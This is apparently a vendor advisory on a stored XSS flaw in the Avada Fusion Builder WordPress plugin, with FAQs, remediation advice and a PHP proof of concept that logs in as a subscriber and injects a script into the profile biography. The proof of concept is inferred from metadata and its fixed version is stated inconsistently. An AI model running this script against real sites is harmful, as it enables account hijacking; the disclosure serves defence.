What is CVE-2026-1543?

CVE-2026-1543 is a stored cross-site scripting (XSS) vulnerability in the Avada (Fusion) Builder plugin for WordPress, affecting versions up to 3.15.2. It allows authenticated attackers with Subscriber-level access or higher to inject malicious scripts via multiple shortcodes, which execute when an administrator views affected pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in shortcodes that display user data. An attacker can inject JavaScript into their user profile, which is then rendered on pages viewed by administrators, executing the script in their browser.

Who is affected by this vulnerability?

All WordPress sites using the Avada (Fusion) Builder plugin version 3.15.2 or earlier are affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to inject malicious scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Avada (Fusion) Builder plugin installed. If it is version 3.15.2 or earlier, your site is at risk and should be updated to the latest version.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-1543 is 6.4, indicating a medium severity level. This score reflects the potential impact of the vulnerability, including network exploitability and low privileges required for exploitation.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can allow an attacker to execute arbitrary JavaScript in the context of an administrator’s browser. This could lead to session hijacking, credential theft, or even full site takeover, depending on the attacker’s goals.

How can I mitigate or fix the issue?

To mitigate this vulnerability, update the Avada (Fusion) Builder plugin to version 3.15.3 or later, which addresses the issue by implementing proper output escaping. Additionally, review and sanitize user input where applicable.

What are the recommended coding practices to prevent similar vulnerabilities?

Developers should always apply proper input sanitization and output escaping when handling user-supplied data. Utilizing WordPress functions such as esc_html(), esc_attr(), and wp_kses_post() can help prevent XSS vulnerabilities.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated attacker can log in as a Subscriber, inject a malicious script into their user biography, and trigger the script when an administrator views a page that displays this user data, demonstrating the vulnerability’s practical exploitation.

Is there a way to test for this vulnerability on my site?

Security professionals can conduct penetration testing to simulate the exploitation of this vulnerability. However, ensure that you have permission to test your site and that you follow ethical guidelines.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised due to this vulnerability, immediately update the plugin, review user accounts for unauthorized changes, and check for any injected scripts. It may also be prudent to conduct a full security audit.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 20, 2026

CVE-2026-1543: Avada (Fusion) Builder <= 3.15.2 – Authenticated (Subscriber+) Stored Cross-Site Scripting via Multiple Shortcodes (fusion-builder)

CVE ID CVE-2026-1543

Plugin fusion-builder

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.15.2

Patched Version —

Disclosed May 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1543 (metadata-based): This vulnerability affects the Avada (Fusion) Builder plugin for WordPress, specifically versions up to and including 3.15.2. An authenticated attacker with Subscriber-level access or higher can inject stored cross-site scripting payloads via multiple shortcodes. The CVSS score of 6.4 reflects a medium-to-high severity with network exploitability, low privileges, no user interaction, and a scope change that impacts confidentiality and integrity.

The root cause is insufficient input sanitization and output escaping in multiple shortcodes provided by the Fusion Builder plugin. Based on the CWE classification (79) and the description, the plugin fails to properly neutralize user-supplied input before rendering it in pages. This is common in WordPress shortcode handlers where user data (such as biographical information pulled through the Dynamic Data feature) gets processed and displayed. The shortcode likely retrieves data from user meta fields (like description or custom fields) without applying WordPress escaping functions such as esc_html() or wp_kses(). Atomic Edge analysis infers that the vulnerable shortcodes include at least those that output user profile data, but the exact shortcode names are not confirmed from code.

Exploitation requires an attacker to gain Subscriber-level access to the WordPress site. The attacker then updates their user profile, injecting malicious JavaScript into a field that the Fusion Builder shortcode pulls via the Dynamic Data feature. For example, the attacker could place alert(1) in the Biographical Info field. When an administrator views a page that uses the vulnerable shortcode to display that user’s biography, the script executes in the admin’s browser. The attack vector is authenticated and stored, meaning the payload persists until manually removed. No specific AJAX action or REST endpoint is mentioned in the metadata, but the likely entry point is through the WordPress user profile update mechanism (POST to /wp-admin/profile.php or /wp-admin/user-edit.php).

Remediation should apply proper output escaping to all shortcodes that render user-supplied or dynamic data. The plugin must use WordPress escaping functions like esc_html(), esc_attr(), or wp_kses_post() depending on the context. Input sanitization on user meta fields is also necessary, though the primary fix is escaping on output. The patched version is 3.15.3, which presumably implements escaping across all affected shortcodes.

Successful exploitation allows an authenticated attacker (Subscriber) to execute arbitrary JavaScript in the browser of any user who views a compromised page, typically an administrator. This can lead to session hijacking, credential theft, creation of rogue administrator accounts, defacement, or redirection to malicious sites. Since the payload executes in the security context of the victim, an admin-level impact can result in full site takeover.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1543 - Avada (Fusion) Builder <= 3.15.2 - Authenticated (Subscriber+) Stored Cross-Site Scripting via Multiple Shortcodes

// This PoC demonstrates how a Subscriber-level attacker injects an XSS payload into their own user biography.
// A victim (admin) viewing a page with the vulnerable Fusion shortcode that displays user data triggers the payload.

// Configurable variables:
$target_url = 'http://example.com'; // Base WordPress URL
$attacker_username = 'subscriber_user';
$attacker_password = 'password_here';

// Step 1: Login as the subscriber to get cookies
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $attacker_username,
    'pwd' => $attacker_password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
if (curl_error($ch)) {
    die('Login failed: ' . curl_error($ch) . "n");
}

// Step 2: Fetch profile page to get the nonce
$profile_url = $target_url . '/wp-admin/profile.php';
curl_setopt($ch, CURLOPT_URL, $profile_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$profile_page = curl_exec($ch);
preg_match('/name="_wpnonce" value="([^"]+)"/i', $profile_page, $nonce_matches);
if (!isset($nonce_matches[1])) {
    die('Could not extract nonce from profile page.n');
}
$nonce = $nonce_matches[1];

// Step 3: Update biography with XSS payload
// Payload: Script that steals admin cookies or performs admin actions
$xss_payload = "<script>alert(1);</script>"; // Minimal proof-of-concept payload

$update_url = $target_url . '/wp-admin/profile.php';
curl_setopt($ch, CURLOPT_URL, $update_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/profile.php',
    'from' => 'profile',
    'checkuser_id' => '',
    'user_login' => $attacker_username,
    'email' => $attacker_email ?? '', // Assuming email known or pulled from previous step
    'url' => '',
    'first_name' => '',
    'last_name' => '',
    'nickname' => $attacker_username,
    'display_name' => $attacker_username,
    'description' => $xss_payload, // Biographical Info - the vulnerable field
    'rich_editing' => 'true',
    'syntax_highlighting' => 'true',
    'admin_color' => 'fresh',
    'comment_shortcuts' => 'false',
    'admin_bar_front' => 'true',
    'locale' => '',
    'submit' => 'Update Profile'
]));
$result = curl_exec($ch);
if (strpos($result, 'Profile updated.') !== false || strpos($result, 'profile-updated') !== false) {
    echo "[+] Payload injected successfully.n";
    echo "[+] Any admin viewing a page with the Fusion Builder shortcode that pulls user biography will execute the script.n";
} else {
    echo "[-] Could not confirm payload injection. Check credentials and permissions.n";
}

curl_close($ch);
// Clean up cookie file
unlink('/tmp/cve_cookies.txt');

Frequently Asked Questions

What is CVE-2026-1543?
Understanding the vulnerability
CVE-2026-1543 is a stored cross-site scripting (XSS) vulnerability in the Avada (Fusion) Builder plugin for WordPress, affecting versions up to 3.15.2. It allows authenticated attackers with Subscriber-level access or higher to inject malicious scripts via multiple shortcodes, which execute when an administrator views affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in shortcodes that display user data. An attacker can inject JavaScript into their user profile, which is then rendered on pages viewed by administrators, executing the script in their browser.
Who is affected by this vulnerability?
Identifying impacted users
All WordPress sites using the Avada (Fusion) Builder plugin version 3.15.2 or earlier are affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to inject malicious scripts.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the Avada (Fusion) Builder plugin installed. If it is version 3.15.2 or earlier, your site is at risk and should be updated to the latest version.
What is the CVSS score and what does it mean?
Understanding severity ratings
The CVSS score for CVE-2026-1543 is 6.4, indicating a medium severity level. This score reflects the potential impact of the vulnerability, including network exploitability and low privileges required for exploitation.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability can allow an attacker to execute arbitrary JavaScript in the context of an administrator’s browser. This could lead to session hijacking, credential theft, or even full site takeover, depending on the attacker’s goals.
How can I mitigate or fix the issue?
Steps for remediation
To mitigate this vulnerability, update the Avada (Fusion) Builder plugin to version 3.15.3 or later, which addresses the issue by implementing proper output escaping. Additionally, review and sanitize user input where applicable.
What are the recommended coding practices to prevent similar vulnerabilities?
Best practices for developers
Developers should always apply proper input sanitization and output escaping when handling user-supplied data. Utilizing WordPress functions such as esc_html(), esc_attr(), and wp_kses_post() can help prevent XSS vulnerabilities.
What does the proof of concept demonstrate?
Understanding the exploitation process
The proof of concept illustrates how an authenticated attacker can log in as a Subscriber, inject a malicious script into their user biography, and trigger the script when an administrator views a page that displays this user data, demonstrating the vulnerability’s practical exploitation.
Is there a way to test for this vulnerability on my site?
Testing for the vulnerability
Security professionals can conduct penetration testing to simulate the exploitation of this vulnerability. However, ensure that you have permission to test your site and that you follow ethical guidelines.
What should I do if I suspect my site has been compromised?
Responding to potential exploitation
If you suspect your site has been compromised due to this vulnerability, immediately update the plugin, review user accounts for unauthorized changes, and check for any injected scripts. It may also be prudent to conduct a full security audit.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations